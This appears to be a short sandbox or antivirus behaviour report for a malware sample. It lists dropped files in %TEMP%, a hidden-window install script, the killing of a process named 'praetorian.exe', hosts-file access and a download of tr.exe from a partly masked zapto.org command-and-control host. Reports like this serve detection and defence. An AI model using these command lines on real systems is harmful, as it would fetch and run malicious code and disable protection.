Technical Information
- '%WINDIR%\syswow64\taskkill.exe' /im "praetorian.exe"
- %TEMP%\7zipsfx.000\install.cmd
- %TEMP%\7zipsfx.000\sams.exe
- <DRIVERS>\etc\hosts
- %TEMP%\7zipsfx.000\install.cmd
- %TEMP%\7zipsfx.000\sams.exe
- DNS ASK cc##.zapto.org
- ClassName: '' WindowName: ''
- '%TEMP%\7zipsfx.000\sams.exe' http://cc##.zapto.org/tr.exe
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\7ZipSfx.000\install.cmd" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\7ZipSfx.000\install.cmd" "
- '%WINDIR%\syswow64\tasklist.exe'
- '%WINDIR%\syswow64\find.exe' /i "sams.exe"